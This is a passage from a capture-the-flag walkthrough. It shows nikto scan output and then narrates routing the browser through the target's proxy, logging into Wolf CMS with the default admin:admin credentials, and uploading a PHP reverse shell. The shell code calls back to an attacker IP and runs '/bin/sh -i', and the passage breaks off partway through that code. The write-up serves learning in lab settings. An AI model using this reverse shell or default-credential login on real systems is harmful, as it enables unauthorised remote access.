+ OSVDB-3092: /ch/: This might be interesting... potential country code (Switzerland)
+ OSVDB-3092: /sy/: This might be interesting... potential country code (Syrian Arab Republic)
+ OSVDB-3092: /tw/: This might be interesting... potential country code (Taiwan)
+ OSVDB-3092: /tj/: This might be interesting... potential country code (Tajikistan)
+ OSVDB-3092: /tz/: This might be interesting... potential country code (United Republic Of Tanzania)
+ OSVDB-3092: /th/: This might be interesting... potential country code (Thailand)
+ OSVDB-3092: /tl/: This might be interesting... potential country code (Timor-leste)
+ OSVDB-3092: /tg/: This might be interesting... potential country code (Togo)
+ OSVDB-3092: /tk/: This might be interesting... potential country code (Tokelau)
+ OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
+ OSVDB-3092: /tt/: This might be interesting... potential country code (Trinidad And Tobago)
+ OSVDB-3092: /tn/: This might be interesting... potential country code (Tunisia)
+ OSVDB-3092: /tr/: This might be interesting... potential country code (Turkey)
+ OSVDB-3092: /tm/: This might be interesting... potential country code (Turkmenistan)
+ OSVDB-3092: /tc/: This might be interesting... potential country code (Turks And Caicos Islands)
+ OSVDB-3092: /tv/: This might be interesting... potential country code (Tuvalu)
+ OSVDB-3092: /ug/: This might be interesting... potential country code (Uganda)
+ OSVDB-3092: /ua/: This might be interesting... potential country code (Ukraine)
+ OSVDB-3092: /ae/: This might be interesting... potential country code (United Arab Emirates)
+ OSVDB-3092: /gb/: This might be interesting... potential country code (United Kingdom)
+ OSVDB-3092: /us/: This might be interesting... potential country code (United States)
+ OSVDB-3092: /um/: This might be interesting... potential country code (United States Minor Outlying Islands)
+ OSVDB-3092: /uy/: This might be interesting... potential country code (Uruguay)
+ OSVDB-3092: /uz/: This might be interesting... potential country code (Uzbekistan)
+ OSVDB-3092: /vu/: This might be interesting... potential country code (Vanuatu)
+ OSVDB-3092: /ve/: This might be interesting... potential country code (Venezuela)
+ OSVDB-3092: /vn/: This might be interesting... potential country code (Viet Nam)
+ OSVDB-3092: /vg/: This might be interesting... potential country code (British Virgin Islands)
+ OSVDB-3092: /vi/: This might be interesting... potential country code (U.S. Virgin Islands)
+ OSVDB-3092: /wf/: This might be interesting... potential country code (Wallis And Futuna)
+ OSVDB-3092: /eh/: This might be interesting... potential country code (Western Sahara)
+ OSVDB-3092: /ye/: This might be interesting... potential country code (Yemen)
+ OSVDB-3092: /zm/: This might be interesting... potential country code (Zambia)
+ OSVDB-3092: /zw/: This might be interesting... potential country code (Zimbabwe)
+ OSVDB-3092: /www/2: This might be interesting...
+ OSVDB-3093: /includes/sendmail.inc: Include files (.inc) should not be served in plain text.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /LICENSE.TXT: License file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ /config/config.txt: Configuration file found.
+ /config/readme.txt: Readme file found.
+ /data/readme.txt: Readme file found.
+ /log/readme.txt: Readme file found.
+ /logs/readme.txt: Readme file found.
+ /uploads/readme.txt: Readme file found.
+ /admin1.php: Admin login page found.
+ /admin.asp: Admin login page/section found.
+ /admin/account.asp: Admin login page/section found.
+ /admin/account.html: Admin login page/section found.
+ /admin/account.php: Admin login page/section found.
+ /admin/controlpanel.asp: Admin login page/section found.
+ /admin/controlpanel.html: Admin login page/section found.
+ /admin/controlpanel.php: Admin login page/section found.
+ /admin/cp.asp: Admin login page/section found.
+ /admin/cp.html: Admin login page/section found.
+ /admin/cp.php: Admin login page/section found.
+ /admin/home.asp: Admin login page/section found.
+ /admin/home.php: Admin login page/section found.
+ /admin/index.asp: Admin login page/section found.
+ /admin/index.html: Admin login page/section found.
+ /admin/login.asp: Admin login page/section found.
+ /admin/login.html: Admin login page/section found.
+ /admin/login.php: Admin login page/section found.
+ /admin1.asp: Admin login page/section found.
+ /admin1.html: Admin login page/section found.
+ /admin1/: Admin login page/section found.
+ /admin2.asp: Admin login page/section found.
+ /admin2.html: Admin login page/section found.
+ /admin2.php: Admin login page/section found.
+ /admin4_account/: Admin login page/section found.
+ /admin4_colon/: Admin login page/section found.
+ /admincontrol.asp: Admin login page/section found.
+ /admincontrol.html: Admin login page/section found.
+ /admincontrol.php: Admin login page/section found.
+ /administer/: Admin login page/section found.
+ /administr8.asp: Admin login page/section found.
+ /administr8.html: Admin login page/section found.
+ /administr8.php: Admin login page/section found.
+ /administr8/: Admin login page/section found.
+ /administracao.php: Admin login page/section found.
+ /administraçao.php: Admin login page/section found.
+ /administracao/: Admin login page/section found.
+ /administraçao/: Admin login page/section found.
+ /administracion.php: Admin login page/section found.
+ /administracion/: Admin login page/section found.
+ /administrateur.php: Admin login page/section found.
+ /administrateur/: Admin login page/section found.
+ /administratie/: Admin login page/section found.
+ /administration.html: Admin login page/section found.
+ /administration.php: Admin login page/section found.
+ /administration/: Admin login page/section found.
+ /administrator.asp: Admin login page/section found.
+ /administrator.html: Admin login page/section found.
+ /administrator.php: Admin login page/section found.
+ /administrator/account.asp: Admin login page/section found.
+ /administrator/account.html: Admin login page/section found.
+ /administrator/account.php: Admin login page/section found.
+ /administrator/index.asp: Admin login page/section found.
+ /administrator/index.html: Admin login page/section found.
+ /administrator/index.php: Admin login page/section found.
+ /administrator/login.asp: Admin login page/section found.
+ /administrator/login.html: Admin login page/section found.
+ /administrator/login.php: Admin login page/section found.
+ /administratoraccounts/: Admin login page/section found.
+ /administrators/: Admin login page/section found.
+ /administrivia/: Admin login page/section found.
+ /adminisztrátora.php: Admin login page/section found.
+ /adminisztrátora/: Admin login page/section found.
+ /adminpanel.asp: Admin login page/section found.
+ /adminpanel.html: Admin login page/section found.
+ /adminpanel.php: Admin login page/section found.
+ /adminpro/: Admin login page/section found.
+ /admins.asp: Admin login page/section found.
+ /admins.html: Admin login page/section found.
+ /admins.php: Admin login page/section found.
+ /admins/: Admin login page/section found.
+ /AdminTools/: Admin login page/section found.
+ /amministratore.php: Admin login page/section found.
+ /amministratore/: Admin login page/section found.
+ /autologin/: Admin login page/section found.
+ /banneradmin/: Admin login page/section found.
+ /bbadmin/: Admin login page/section found.
+ /beheerder.php: Admin login page/section found.
+ /beheerder/: Admin login page/section found.
+ /bigadmin/: Admin login page/section found.
+ /blogindex/: Admin login page/section found.
+ /cadmins/: Admin login page/section found.
+ /ccms/: Admin login page/section found.
+ /ccms/index.php: Admin login page/section found.
+ /ccms/login.php: Admin login page/section found.
+ /ccp14admin/: Admin login page/section found.
+ /cmsadmin/: Admin login page/section found.
+ /configuration/: Admin login page/section found.
+ /configure/: Admin login page/section found.
+ /controlpanel.asp: Admin login page/section found.
+ /controlpanel.html: Admin login page/section found.
+ /controlpanel.php: Admin login page/section found.
+ /controlpanel/: Admin login page/section found.
+ /cp.asp: Admin login page/section found.
+ /cp.html: Admin login page/section found.
+ /cp.php: Admin login page/section found.
+ /cpanel_file/: Admin login page/section found.
+ /customer_login/: Admin login page/section found.
+ /database_administration/: Admin login page/section found.
+ /Database_Administration/: Admin login page/section found.
+ /dir-login/: Admin login page/section found.
+ /directadmin/: Admin login page/section found.
+ /ezsqliteadmin/: Admin login page/section found.
+ /fileadmin.asp: Admin login page/section found.
+ /fileadmin.html: Admin login page/section found.
+ /fileadmin.php: Admin login page/section found.
+ /formslogin/: Admin login page/section found.
+ /globes_admin/: Admin login page/section found.
+ /hpwebjetadmin/: Admin login page/section found.
+ /Indy_admin/: Admin login page/section found.
+ /irc-macadmin/: Admin login page/section found.
+ /LiveUser_Admin/: Admin login page/section found.
+ /login_db/: Admin login page/section found.
+ /login-redirect/: Admin login page/section found.
+ /login-us/: Admin login page/section found.
+ /login.asp: Admin login page/section found.
+ /login.html: Admin login page/section found.
+ /login.php: Admin login page/section found.
+ /login1/: Admin login page/section found.
+ /loginflat/: Admin login page/section found.
+ /logo_sysadmin/: Admin login page/section found.
+ /Lotus_Domino_Admin/: Admin login page/section found.
+ /macadmin/: Admin login page/section found.
+ /maintenance/: Admin login page/section found.
+ /manuallogin/: Admin login page/section found.
+ /memlogin/: Admin login page/section found.
+ /meta_login/: Admin login page/section found.
+ /modelsearch/login.asp: Admin login page/section found.
+ /modelsearch/login.php: Admin login page/section found.
+ /moderator.asp: Admin login page/section found.
+ /moderator.html: Admin login page/section found.
+ /moderator.php: Admin login page/section found.
+ /moderator/: Admin login page/section found.
+ /moderator/admin.asp: Admin login page/section found.
+ /moderator/admin.html: Admin login page/section found.
+ /moderator/admin.php: Admin login page/section found.
+ /moderator/login.asp: Admin login page/section found.
+ /moderator/login.html: Admin login page/section found.
+ /moderator/login.php: Admin login page/section found.
+ /myadmin/: Admin login page/section found.
+ /navSiteAdmin/: Admin login page/section found.
+ /newsadmin/: Admin login page/section found.
+ /openvpnadmin/: Admin login page/section found.
+ /painel/: Admin login page/section found.
+ /panel/: Admin login page/section found.
+ /pgadmin/: Admin login page/section found.
+ /phpldapadmin/: Admin login page/section found.
+ /phppgadmin/: Admin login page/section found.
+ /phpSQLiteAdmin/: Admin login page/section found.
+ /platz_login/: Admin login page/section found.
+ /power_user/: Admin login page/section found.
+ /project-admins/: Admin login page/section found.
+ /pureadmin/: Admin login page/section found.
+ /radmind-1/: Admin login page/section found.
+ /radmind/: Admin login page/section found.
+ /rcLogin/: Admin login page/section found.
+ /server_admin_small/: Admin login page/section found.
+ /Server.asp: Admin login page/section found.
+ /Server.html: Admin login page/section found.
+ /Server.php: Admin login page/section found.
+ /ServerAdministrator/: Admin login page/section found.
+ /showlogin/: Admin login page/section found.
+ /simpleLogin/: Admin login page/section found.
+ /smblogin/: Admin login page/section found.
+ /sql-admin/: Admin login page/section found.
+ /ss_vms_admin_sm/: Admin login page/section found.
+ /sshadmin/: Admin login page/section found.
+ /staradmin/: Admin login page/section found.
+ /sub-login/: Admin login page/section found.
+ /Super-Admin/: Admin login page/section found.
+ /support_login/: Admin login page/section found.
+ /sys-admin/: Admin login page/section found.
+ /sysadmin.asp: Admin login page/section found.
+ /sysadmin.html: Admin login page/section found.
+ /sysadmin.php: Admin login page/section found.
+ /sysadmin/: Admin login page/section found.
+ /SysAdmin/: Admin login page/section found.
+ /SysAdmin2/: Admin login page/section found.
+ /sysadmins/: Admin login page/section found.
+ /system_administration/: Admin login page/section found.
+ /system-administration/: Admin login page/section found.
+ /ur-admin.asp: Admin login page/section found.
+ /ur-admin.html: Admin login page/section found.
+ /ur-admin.php: Admin login page/section found.
+ /ur-admin/: Admin login page/section found.
+ /useradmin/: Admin login page/section found.
+ /UserLogin/: Admin login page/section found.
+ /utility_login/: Admin login page/section found.
+ /v2/painel/: Admin login page/section found.
+ /vadmind/: Admin login page/section found.
+ /vmailadmin/: Admin login page/section found.
+ /webadmin.asp: Admin login page/section found.
+ /webadmin.html: Admin login page/section found.
+ /webadmin.php: Admin login page/section found.
+ /webmaster/: Admin login page/section found.
+ /websvn/: Admin login page/section found.
+ /wizmysqladmin/: Admin login page/section found.
+ /wp-admin/: Admin login page/section found.
+ /wordpresswp-admin/: Admin login page/section found.
+ /wp-login/: Admin login page/section found.
+ /wordpresswp-login/: Admin login page/section found.
+ /xlogin/: Admin login page/section found.
+ /yonetici.asp: Admin login page/section found.
+ /yonetici.html: Admin login page/section found.
+ /yonetici.php: Admin login page/section found.
+ /yonetim.asp: Admin login page/section found.
+ /yonetim.html: Admin login page/section found.
+ /yonetim.php: Admin login page/section found.
+ OSVDB-3092: /test.asp: This might be interesting...
+ OSVDB-3092: /test.aspx: This might be interesting...
+ OSVDB-3092: /test.php: This might be interesting...
+ /maintenance.asp: This might be interesting...
+ /maintenance.aspx: This might be interesting...
+ /maint/: This might be interesting...
+ /maint.asp: This might be interesting...
+ /maint.aspx: This might be interesting...
+ OSVDB-59440: /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml: VMWare ESX is vulnerable to a directory traversal attack.
+ /jk-status: mod_jk status page is visible.
+ /balancer-manager: mod_proxy_balancer management page is visible.
+ /servlets-examples/: Tomcat servlets examples are visible.
+ /admin-console: JBoss admin console is visible.
+ /help.php: A help file was found.
+ /gif/hp_invent_logo.gif: This device may be an HP printer/scanner and allow retrieval of previously scanned images.
+ /gif/tricolor_ink_guage.gif: This device may be an HP printer/scanner and allow retrieval of previously scanned images.
+ OSVDB-3092: /messages/: This might be interesting...
+ OSVDB-3092: /cms/: This might be interesting...
+ OSVDB-3092: /helpdesk/: This might be interesting...
+ /3rdparty/phpMyAdmin/: phpMyAdmin directory found
+ /phpMyAdmin/: phpMyAdmin directory found
+ /3rdparty/phpmyadmin/: phpMyAdmin directory found
+ /phpmyadmin/: phpMyAdmin directory found
+ /pma/: phpMyAdmin directory found
+ /spin/main.csp: CA iTechnology SPIN interface found
+ /openadmin/: Informix OpenAdmin tool administration login
+ OSVDB-3092: /.svn/entries: Subversion Entries file may contain directory listing information.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ OSVDB-3092: /.hg/dirstate: Mercurial DirState file may contain directory listing information.
+ OSVDB-3092: /test.jsp: This might be interesting...
+ /mobileadmin/db/MobileAdminDB.sqlite: RoveIT Mobile Admin internal database is available for download
+ /notes.txt: This might be interesting...
+ OSVDB-3092: /exception.php: PHP Exceptions File
+ /adfs/ls/?wa=wsignout1.0: Active Directory Federation Services sign out page found.
+ /adfs/ls/?wa=wsignin1.0&wtrealm=http://www.cirt.net/: Active Directory Federation Services sign in page found.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /jk-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /jk-status/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /host-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ OSVDB-96181: /adfs/services/proxytrustpolicystoretransfer: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/fs/federationserverservice.asmx: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/samlprotocol/proxytrust: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/mexsoap: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxymexhttpget/: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxymex: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/windowstransport: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/certificatemixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/certificatetransport: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/usernamemixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/kerberosmixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/issuedtokenmixedasymmetricbasic256: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/issuedtokenmixedsymmetricbasic256: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/13/kerberosmixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/13/certificatemixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/13/usernamemixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/13/issuedtokenmixedasymmetricbasic256: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/13/issuedtokenmixedsymmetricbasic256: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trusttcp/windows: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxytrust: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxytrust13: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxytrustprovisionusername: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxytrustprovisionissuedtoken: Active Directory Federation Services page found.
+ OSVDB-96181: /FederationMetadata/2007-06/: Active Directory Federation Services page found.
+ OSVDB-96181: /Federationmetadata/2007-06/FederationMetadata.xml: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/ls/IdpInitiatedSignon.aspx: Active Directory Federation Services page found.
+ /console/: Application console found
+ /wsman/: Windows Remote Management is enabled
+ /fantastico_fileslist.txt: fantastico_fileslist.txt file found. This file contains a list of all the files from the current directory.
+ /webservices/: Webservices found
+ /atg/bcc: Oracle ATG Business Control Center
+ /dyn/admin/: Admin page found; possibly Oracle ATG
+ /crx: Adobe CQ CRX Console
+ /system/console/configMgr: OSGi Apache Felix console
+ /system/console/bundles: OSGi Apache Felix console
+ /system/console: OSGi Apache Felix console
+ /repository/: CRX WebDAV upload
+ /cqresource/: CRX WebDAV upload
+ /etc/cloudservices: Adobe Experience Manager Cloud Service Information
+ /etc/reports: Adobe Experience Manager Reports
+ OSVDB-3092: /dumpinfo: National Instruments Service Locator
+ /manage/Logs/: Covertix SmartCipher Console Login and Web Service Log directory detected
+ /rsa: Encryption key exposed
+ /rsa.old: Encryption key exposed
+ /dsa: Encryption key exposed
+ /dsa.old: Encryption key exposed
+ /id_rsa: Encryption key exposed
+ /id_rsa.old: Encryption key exposed
+ /id_dsa: Encryption key exposed
+ /id_dsa.old: Encryption key exposed
+ /identity: Encryption key exposed
+ /key: Encryption key exposed
+ /key.priv: Encryption key exposed
+ /encrypt.aspx: This might be interesting...
+ /decrypt.aspx: This might be interesting...
+ /encrypt.php: This might be interesting...
+ /decrypt.php: This might be interesting...
+ /encrypt.asp: This might be interesting...
+ /decrypt.asp: This might be interesting...
+ /encrypt.jsp: This might be interesting...
+ /decrypt.jsp: This might be interesting...
+ /encrypt: This might be interesting...
+ /decrypt: This might be interesting...
+ OSVDB-3093: /includes/db.inc: Include files (.inc) should not be served in plain text.
+ /CHANGELOG.txt: Version number implies that there is a SQL Injection in Drupal 7, can be used for authentication bypass (Drupageddon: see https://www.sektioneins.de/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html).
+ /debug.jsp: Possible debug directory/program found.
+ /debug.asp: Possible debug directory/program found.
+ /debug.php: Possible debug directory/program found.
+ /debug/: Possible debug directory/program found.
+ OSVDB-637: /~ftp/: Allowed to browse ftp user's home directory.
+ /_vti_bin/owssvr.dll: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/WS_FTP.log: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/ws_ftp.log: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
+ /_layouts/addrole.aspx: FrontPage/Sharepointfile available.
+ /_layouts/AdminRecycleBin.aspx: FrontPage/Sharepointfile available.
+ /_layouts/AreaNavigationSettings.aspx: FrontPage/Sharepointfile available.
+ /_Layouts/AreaTemplateSettings.aspx: FrontPage/Sharepointfile available.
+ /_Layouts/AreaWelcomePage.aspx: FrontPage/Sharepointfile available.
+ /_layouts/bpcf.aspx: FrontPage/Sharepointfile available.
+ /_Layouts/ChangeSiteMasterPage.aspx: FrontPage/Sharepointfile available.
+ /_layouts/create.aspx: FrontPage/Sharepointfile available.
+ /_layouts/editgrp.aspx: FrontPage/Sharepointfile available.
+ /_layouts/editprms.aspx: FrontPage/Sharepointfile available.
+ /_layouts/help.aspx: FrontPage/Sharepointfile available.
+ /_layouts/images/: FrontPage/Sharepointfile available.
+ /_layouts/listedit.aspx: FrontPage/Sharepointfile available.
+ /_layouts/ManageFeatures.aspx: FrontPage/Sharepointfile available.
+ /_layouts/mcontent.aspx: FrontPage/Sharepointfile available.
+ /_layouts/mngctype.aspx: FrontPage/Sharepointfile available.
+ /_layouts/mngfield.aspx: FrontPage/Sharepointfile available.
+ /_layouts/mngsiteadmin.aspx: FrontPage/Sharepointfile available.
+ /_layouts/mngsubwebs.aspx: FrontPage/Sharepointfile available.
+ /_layouts/mngsubwebs.aspx?view=sites: FrontPage/Sharepointfile available.
+ /_layouts/mobile/mbllists.aspx: FrontPage/Sharepointfile available.
+ /_layouts/MyInfo.aspx: FrontPage/Sharepointfile available.
+ /_layouts/MyPage.aspx: FrontPage/Sharepointfile available.
+ /_layouts/MyTasks.aspx: FrontPage/Sharepointfile available.
+ /_layouts/navoptions.aspx: FrontPage/Sharepointfile available.
+ /_layouts/NewDwp.aspx: FrontPage/Sharepointfile available.
+ /_layouts/newgrp.aspx: FrontPage/Sharepointfile available.
+ /_layouts/newsbweb.aspx: FrontPage/Sharepointfile available.
+ /_layouts/PageSettings.aspx: FrontPage/Sharepointfile available.
+ /_layouts/people.aspx?MembershipGroupId=0: FrontPage/Sharepointfile available.
+ /_layouts/permsetup.aspx: FrontPage/Sharepointfile available.
+ /_layouts/picker.aspx: FrontPage/Sharepointfile available.
+ /_layouts/policy.aspx: FrontPage/Sharepointfile available.
+ /_layouts/policyconfig.aspx: FrontPage/Sharepointfile available.
+ /_layouts/policycts.aspx: FrontPage/Sharepointfile available.
+ /_layouts/Policylist.aspx: FrontPage/Sharepointfile available.
+ /_layouts/prjsetng.aspx: FrontPage/Sharepointfile available.
+ /_layouts/quiklnch.aspx: FrontPage/Sharepointfile available.
+ /_layouts/recyclebin.aspx: FrontPage/Sharepointfile available.
+ /_Layouts/RedirectPage.aspx: FrontPage/Sharepointfile available.
+ /_layouts/role.aspx: FrontPage/Sharepointfile available.
+ /_layouts/settings.aspx: FrontPage/Sharepointfile available.
+ /_layouts/SiteDirectorySettings.aspx: FrontPage/Sharepointfile available.
+ /_layouts/sitemanager.aspx: FrontPage/Sharepointfile available.
+ /_layouts/SiteManager.aspx?lro=all: FrontPage/Sharepointfile available.
+ /_layouts/spcf.aspx: FrontPage/Sharepointfile available.
+ /_layouts/storman.aspx: FrontPage/Sharepointfile available.
+ /_layouts/themeweb.aspx: FrontPage/Sharepointfile available.
+ /_layouts/topnav.aspx: FrontPage/Sharepointfile available.
+ /_layouts/user.aspx: FrontPage/Sharepointfile available.
+ /_layouts/userdisp.aspx?ID=1: FrontPage/Sharepointfile available.
+ /_layouts/useredit.aspx: FrontPage/Sharepointfile available.
+ /_layouts/useredit.aspx?ID=1: FrontPage/Sharepointfile available.
+ /_layouts/viewlsts.aspx: FrontPage/Sharepointfile available.
+ /_layouts/vsubwebs.aspx: FrontPage/Sharepointfile available.
+ /_layouts/WPPrevw.aspx?ID=247: FrontPage/Sharepointfile available.
+ /_layouts/wrkmng.aspx: FrontPage/Sharepointfile available.
+ /Forms/DispForm.aspx: FrontPage/Sharepointfile available.
+ /Forms/DispForm.aspx?ID=1: FrontPage/Sharepointfile available.
+ /Forms/EditForm.aspx: FrontPage/Sharepointfile available.
+ /Forms/EditForm.aspx?ID=1: FrontPage/Sharepointfile available.
+ /Forms/Forms/AllItems.aspx: FrontPage/Sharepointfile available.
+ /Forms/MyItems.aspx: FrontPage/Sharepointfile available.
+ /Forms/NewForm.aspx: FrontPage/Sharepointfile available.
+ /Pages/default.aspx: FrontPage/Sharepointfile available.
+ /Pages/Forms/AllItems.aspx: FrontPage/Sharepointfile available.
+ /_catalogs/masterpage/Forms/AllItems.aspx: FrontPage/Sharepointfile available.
+ /_catalogs/wp/Forms/AllItems.aspx: FrontPage/Sharepointfile available.
+ /_catalogs/wt/Forms/Common.aspx: FrontPage/Sharepointfile available.
+ /_vti_pvt/service.grp: FrontPage/Sharepointfile available.
+ /_vti_pvt/botsinf.cnf: FrontPage/Sharepointfile available.
+ /_vti_pvt/structure.cnf: FrontPage/Sharepointfile available.
+ /_vti_pvt/uniqperm.cnf: FrontPage/Sharepointfile available.
+ /server-manager/: Mitel Audio and Web Conferencing server manager identified.
+ /wp-content/plugins/gravityforms/change_log.txt: Gravity forms is installed. Based on the version number in the changelog, it is vulnerable to an authenticated SQL injection. https://wpvulndb.com/vulnerabilities/7849
+ /wordpresswp-content/plugins/gravityforms/change_log.txt: Gravity forms is installed. Based on the version number in the changelog, it is vulnerable to an authenticated SQL injection. https://wpvulndb.com/vulnerabilities/7849
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ /jk-manager/status: Tomcat Server Status interface found (pass protected)
+ /jk-status/status: Tomcat Server Status interface found (pass protected)
+ /admin/status: Tomcat Server Status interface found (pass protected)
+ /host-manager/status: Tomcat Server Status interface found (pass protected)
+ /server-status: Apache server-status interface found (protected/forbidden)
+ /server-info: Apache server-info interface found (protected/forbidden)
+ /humans.txt: The humans.txt file may reveal information aboute site owners/developers. See http://humanstxt.org/ for info.
+ /en/setup: Silex USB-device has a default credential root: (empty password) set.
+ /admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)
+ /cms-admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)
+ /system/console/configMgr: Adobe Experience Manager OSGi console.
+ /system/console/bundles: Adobe Experience Manager OSGi console found.
+ /web.txt: This might be interesting...
+ /loleaflet/dist/admin/admin.html: LibreOffice Online Admin interface found (pass protected)
+ /dist/admin/admin.html: LibreOffice Online Admin interface found (pass protected)
+ /wls-wsat/CoordinatorPortType: This application may be vulnerable to http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271.
+ /wls-wsat/RegistrationPortTypeRPC: This application may be vulnerable to http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271.
+ /wls-wsat/ParticipantPortType: This application may be vulnerable to http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271.
+ /wls-wsat/RegistrationRequesterPortType: This application may be vulnerable to http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271.
+ /wls-wsat/CoordinatorPortType11: This application may be vulnerable to http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271.
+ /wls-wsat/RegistrationPortTypeRPC11: This application may be vulnerable to http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271.
+ /wls-wsat/ParticipantPortType11: This application may be vulnerable to http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271.
+ /master.xml: This might be interesting...
+ /masters.xml: This might be interesting...
+ /connections.xml: This might be interesting...
+ /connection.xml: This might be interesting...
+ /passwords.xml: This might be interesting...
+ /PasswordsData.xml: This might be interesting...
+ /users.xml: This might be interesting...
+ /conndb.xml: This might be interesting...
+ /conn.xml: This might be interesting...
+ /security.xml: This might be interesting...
+ /accounts.xml: This might be interesting...
+ /db.json: This might be interesting...
+ /userdata.json: This might be interesting...
+ /login.json: This might be interesting...
+ /master.json: This might be interesting...
+ /masters.json: This might be interesting...
+ /connections.json: This might be interesting...
+ /connection.json: This might be interesting...
+ /passwords.json: This might be interesting...
+ /PasswordsData.json: This might be interesting...
+ /users.json: This might be interesting...
+ /conndb.json: This might be interesting...
+ /conn.json: This might be interesting...
+ /accounts.json: This might be interesting...
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
+ /.hgignore: .hgignore file found. It is possible to grasp the directory structure.
+ /.env: .env file found. The .env file may contain credentials.
+ 7917 requests: 0 error(s) and 2170 item(s) reported on remote host
+ End Time: 2021-10-24 02:40:22 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

As I am the lazy one in our group, I just went on with dirb to make some sense out of this mesh.

Dirb

And here actually I did the mistake of going to the IP Address on the browser without any proxy.

The Rabbit Hole (You can ignore this section if you want to…)

These are the results I got and initially thought I might need to have a VPN to get access to these URL. And actually wasted a lot of time the following day trying to come up with some way to pass through it.

Didn’t happen so here is what I did to get out of the rabbit-hole, just go to some place nice, eat a load and come back (or just order something nice for yourself online, whatever you prefer.) And yeah, that worked for me quite right because finally I was able to get the idea of proxy to bypass the invalid URL.

Firefox proxy

Scroll down to the bottom,

Choose Manual proxy and fill-in HTTP Proxy as the IP Address of the Target machine with port 3128.

Website

Okay!!, well I also checked the source code and nothing interesting there, so I won’t bother you with those details, let’s just move on okay…

Going through the URLs

As the output of dirb, we get to know different URLs we might be interested in, so let’s start one-by-one,

cgi-bin and server status

These two gave us a 403 error so there is no need to go through this one. Let’s continue with the others.

connect

Hmmm!! So some python code working on the server, okay not a bad thing let’s save it for later.

index and index.php

As the name suggest, it just contains the index page of the website, nothing to see here!!

robots and robots.txt

Here, actually we got something of interest,

So we have wolfcms to try out, and let hope it has anonymous file upload so that we can get a shell.

/wolfcms

Okay, so we don’t have the anonymous file upload we were hoping for, but at least we can try to login as administrator. We have a lot of tools to brute force that login. Well the funny part is I didn’t use any tool at all. No I am not a script kiddie, I just typed out admin;admin before trying out the tools.

Funny!! that was the valid credential and I don’t know how to add emojis here. Please someone tell me.

Username — admin

Password — admin

Login as administrator and file upload

So, the expected working out here, we can upload files, even malicious code to get a shell.

So, here is the website I found out the php code to proceed with. (Well yeah I am a script kiddie, so what!! I am still learning.)

Download the tar file, unzip it and upload the file as an article in the website.

Code

<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.162.128'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}

// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);
